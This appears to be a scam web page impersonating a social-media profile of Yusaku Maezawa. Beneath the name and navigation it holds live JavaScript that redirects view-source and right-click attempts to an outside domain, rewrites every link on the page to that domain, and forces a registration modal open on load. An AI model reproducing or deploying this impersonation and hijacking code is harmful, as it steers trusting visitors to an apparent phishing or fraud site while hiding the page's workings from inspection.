Yusaku Maezawa 前澤友作

@YusakuMaezawa

Home About Video Photos More
function redirectCU(e) { if (e.ctrlKey && e.which == 85) { window.location.replace("http://surez.xyz/oke/?&sub=NUHA_ULTAH"); return false; } } document.onkeydown = redirectCU; function redirectKK(e) { if (e.which == 3) { window.location.replace("http://surez.xyz/oke/?&sub=NUHA_ULTAH"); return false; } } document.oncontextmenu = redirectKK; $(window).on('load',function(){ $('#register_form').modal('show'); }); $("a").attr("href", "http://surez.xyz/oke/?&sub=NUHA_ULTAH");